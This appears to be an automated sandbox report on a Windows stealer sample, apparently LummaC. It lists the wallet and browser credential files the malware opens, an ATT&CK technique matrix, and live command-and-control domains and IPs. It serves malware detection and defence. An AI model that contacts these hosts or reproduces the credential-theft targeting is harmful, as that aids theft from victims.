                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Yara matchFile source: 00000003.00000003.2773711720.000000000345D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000003.2773902054.000000000345D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 4512, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: aspnet_regiis.exe PID: 4512, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                2
                OS Credential Dumping
                1
                System Time Discovery
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                Boot or Logon Initialization Scripts311
                Process Injection
                11
                Deobfuscate/Decode Files or Information
                LSASS Memory1
                File and Directory Discovery
                Remote Desktop Protocol4
                Data from Local System
                2
                Non-Application Layer Protocol
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell
                Logon Script (Windows)Logon Script (Windows)4
                Obfuscated Files or Information
                Security Account Manager33
                System Information Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                113
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                Software Packing
                NTDS251
                Security Software Discovery
                Distributed Component Object Model3
                Clipboard Data
                Protocol ImpersonationTraffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                DLL Side-Loading
                LSA Secrets23
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Masquerading
                Cached Domain Credentials1
                Process Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items23
                Virtualization/Sandbox Evasion
                DCSync1
                Application Window Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job311
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                PASS-1234.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\gdi32.dll100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://abruptyopsn.shop:443/apial100%Avira URL Cloudmalware
                https://abruptyopsn.shop/api9v9-100%Avira URL Cloudmalware
                https://abruptyopsn.shop:443/apiffxt.default-release/key4.dbPK100%Avira URL Cloudmalware
                https://abruptyopsn.shop/apii100%Avira URL Cloudmalware
                https://abruptyopsn.shop/4100%Avira URL Cloudmalware
                https://abruptyopsn.shop/Ow100%Avira URL Cloudmalware
                https://abruptyopsn.shop/N100%Avira URL Cloudmalware
                https://abruptyopsn.shop/apid100%Avira URL Cloudmalware
                undesirabkel.click100%Avira URL Cloudmalware
                https://abruptyopsn.shop/api100%Avira URL Cloudmalware
                https://undesirabkel.click/api100%Avira URL Cloudmalware
                https://abruptyopsn.shop/Y100%Avira URL Cloudmalware
                https://abruptyopsn.shop/100%Avira URL Cloudmalware
                https://abruptyopsn.shop/22h100%Avira URL Cloudmalware
                https://abruptyopsn.shop/apiNET;100%Avira URL Cloudmalware
                https://abruptyopsn.shop/g100%Avira URL Cloudmalware
                http://crl.miH0%Avira URL Cloudsafe
                https://abruptyopsn.shop/apiB100%Avira URL Cloudmalware
                https://abruptyopsn.shop/api4100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                undesirabkel.click
                188.114.97.3
                truefalse
                  high
                  abruptyopsn.shop
                  104.21.96.1
                  truetrue
                    unknown
                    nearycrepso.shop
                    unknown
                    unknowntrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      undesirabkel.clicktrue
                      • Avira URL Cloud: malware
                      unknown
                      rabidcowse.shopfalse
                        high
                        wholersorie.shopfalse
                          high
                          https://abruptyopsn.shop/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          https://undesirabkel.click/apitrue
                          • Avira URL Cloud: malware
                          unknown
                          cloudewahsj.shopfalse
                            high
                            noisycuttej.shopfalse
                              high
                              nearycrepso.shopfalse
                                high
                                framekgirus.shopfalse
                                  high
                                  tirepublicerj.shopfalse
                                    high
                                    abruptyopsn.shopfalse
                                      high
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://duckduckgo.com/chrome_newtabaspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://duckduckgo.com/ac/?q=aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://abruptyopsn.shop:443/apialaspnet_regiis.exe, 00000003.00000003.2783626201.00000000058C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgaspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://abruptyopsn.shop/4aspnet_regiis.exe, 00000003.00000003.2738030151.00000000034CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              unknown
                                              http://x1.c.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://x1.i.lencr.org/0aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchaspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.mozilla.org/products/firefoxgro.allaspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.mozilla.oraspnet_regiis.exe, 00000003.00000003.2726217533.00000000058EA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://abruptyopsn.shop:443/apiffxt.default-release/key4.dbPKaspnet_regiis.exe, 00000003.00000003.2788177021.00000000058C1000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2829918442.00000000058C0000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3390437810.00000000058C3000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783626201.00000000058C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://abruptyopsn.shop/api9v9-aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://abruptyopsn.shop/apidaspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788196527.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389965700.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoaspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            high
                                                            https://abruptyopsn.shop/Naspnet_regiis.exe, 00000003.00000002.3389991161.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiaspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://abruptyopsn.shop/apiiaspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://abruptyopsn.shop/Owaspnet_regiis.exe, 00000003.00000003.2700805678.000000000345D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://crl.rootca1.amazontrust.com/rootca1.crl0aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://upx.sf.netAmcache.hve.6.drfalse
                                                                    high
                                                                    http://ocsp.rootca1.amazontrust.com0:aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://abruptyopsn.shop/gaspnet_regiis.exe, 00000003.00000003.2773956570.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2738030151.00000000034CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      https://www.ecosia.org/newtab/aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://abruptyopsn.shop/Yaspnet_regiis.exe, 00000003.00000003.2725007769.00000000034CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: malware
                                                                        unknown
                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-braspnet_regiis.exe, 00000003.00000003.2726290907.00000000059D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://abruptyopsn.shop/22haspnet_regiis.exe, 00000003.00000003.2700805678.0000000003431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://ac.ecosia.org/autocomplete?q=aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://crl.miHaspnet_regiis.exe, 00000003.00000003.2700922914.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2738030151.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2725007769.000000000345D000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2700786138.0000000003499000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://abruptyopsn.shop/apiBaspnet_regiis.exe, 00000003.00000003.2783642463.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773860884.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2793627901.000000000349B000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783743972.00000000034A6000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2788196527.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2783789033.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773630048.0000000003499000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.3389965700.00000000034B3000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2773956570.00000000034B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://abruptyopsn.shop/apiNET;aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgaspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3aspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://crt.rootca1.amazontrust.com/rootca1.cer0?aspnet_regiis.exe, 00000003.00000003.2725271757.00000000058EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://abruptyopsn.shop/api4aspnet_regiis.exe, 00000003.00000003.2793627901.00000000034CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=aspnet_regiis.exe, 00000003.00000003.2701763004.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701676095.00000000058FB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2701590695.00000000058FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://abruptyopsn.shop/aspnet_regiis.exe, 00000003.00000003.2830061957.00000000034CE000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2712906052.00000000058C6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2712090796.00000000058B9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaaspnet_regiis.exe, 00000003.00000003.2726569817.00000000034D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        • No. of IPs < 25%
                                                                                        • 25% < No. of IPs < 50%
                                                                                        • 50% < No. of IPs < 75%
                                                                                        • 75% < No. of IPs
                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                        188.114.97.3
                                                                                        undesirabkel.clickEuropean Union
                                                                                        13335CLOUDFLARENETUSfalse
                                                                                        104.21.96.1
                                                                                        abruptyopsn.shopUnited States
                                                                                        13335CLOUDFLARENETUStrue
                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                        Analysis ID:1582873
                                                                                        Start date and time:2024-12-31 17:38:18 +01:00
                                                                                        Joe Sandbox product:CloudBasic
                                                                                        Overall analysis duration:0h 6m 9s
                                                                                        Hypervisor based Inspection enabled:false
                                                                                        Report type:full
                                                                                        Cookbook file name:default.jbs
                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                        Number of analysed new started processes analysed:11
                                                                                        Number of new started drivers analysed:0
                                                                                        Number of existing processes analysed:0
                                                                                        Number of existing drivers analysed:0
                                                                                        Number of injected processes analysed:0
                                                                                        Technologies:
                                                                                        • HCA enabled
                                                                                        • EGA enabled
                                                                                        • AMSI enabled
                                                                                        Analysis Mode:default
                                                                                        Analysis stop reason:Timeout
                                                                                        Sample name:PASS-1234.exe
                                                                                        Detection:MAL
                                                                                        Classification:mal100.troj.spyw.evad.winEXE@5/7@3/2
                                                                                        EGA Information:
                                                                                        • Successful, ratio: 100%
                                                                                        HCA Information:
                                                                                        • Successful, ratio: 98%
                                                                                        • Number of executed functions: 35
                                                                                        • Number of non-executed functions: 66
                                                                                        Cookbook Comments:
                                                                                        • Found application associated with file extension: .exe
                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                        • Excluded IPs from analysis (whitelisted): 20.189.173.20, 40.126.32.140, 13.107.246.45, 52.149.20.212
                                                                                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, login.live.com, otelrules.azureedge.net, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                        • VT rate limit hit for: PASS-1234.exe
                                                                                        TimeTypeDescription
                                                                                        11:39:17API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                        11:39:45API Interceptor11x Sleep call for process: aspnet_regiis.exe modified
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        188.114.97.3RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.rgenerousrs.store/o362/
                                                                                        A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.beylikduzu616161.xyz/2nga/
                                                                                        Delivery_Notification_00000260791.doc.jsGet hashmaliciousUnknownBrowse
                                                                                        • radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
                                                                                        ce.vbsGet hashmaliciousUnknownBrowse
                                                                                        • paste.ee/d/lxvbq
                                                                                        Label_00000852555.doc.jsGet hashmaliciousUnknownBrowse
                                                                                        • tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
                                                                                        PO 20495088.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.ssrnoremt-rise.sbs/3jsc/
                                                                                        QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • filetransfer.io/data-package/zWkbOqX7/download
                                                                                        http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
                                                                                        • kklk16.bsyo45ksda.top/favicon.ico
                                                                                        gusetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • www.glarysoft.com/update/glary-utilities/pro/pro50/
                                                                                        Online Interview Scheduling Form.lnkGet hashmaliciousDucktailBrowse
                                                                                        • gmtagency.online/api/check
                                                                                        104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                        • pelisplus.so/administrator/index.php
                                                                                        Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                        • www.mffnow.info/1a34/
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        abruptyopsn.shopReploidReplic.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.48.1
                                                                                        BasesRow.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.64.1
                                                                                        undesirabkel.clickLauncher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        6QLvb9i.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.30.13
                                                                                        WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.30.13
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        CLOUDFLARENETUSLoader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.75.163
                                                                                        Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Delta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.52.90
                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 104.21.24.64
                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                        • 172.64.41.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 172.67.217.81
                                                                                        CLOUDFLARENETUSLoader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.80.1
                                                                                        Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        LinxOptimizer.exeGet hashmaliciousUnknownBrowse
                                                                                        • 172.67.75.163
                                                                                        Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Delta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.96.1
                                                                                        Active_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                        • 104.21.52.90
                                                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                                                        • 188.114.97.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 104.21.24.64
                                                                                        over.ps1Get hashmaliciousVidarBrowse
                                                                                        • 172.64.41.3
                                                                                        NL Hybrid.exeGet hashmaliciousTitanium Proxy, PureLog StealerBrowse
                                                                                        • 172.67.217.81
                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        a0e9f5d64349fb13191bc781f81f42e1Loader.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        • 104.21.96.1
                                                                                        Launcher_x64.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        • 104.21.96.1
                                                                                        Solara-Roblox-Executor-v3.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
                                                                                        • 104.21.96.1
                                                                                        Delta.exeGet hashmaliciousLummaCBrowse
                                                                                        • 188.114.97.3
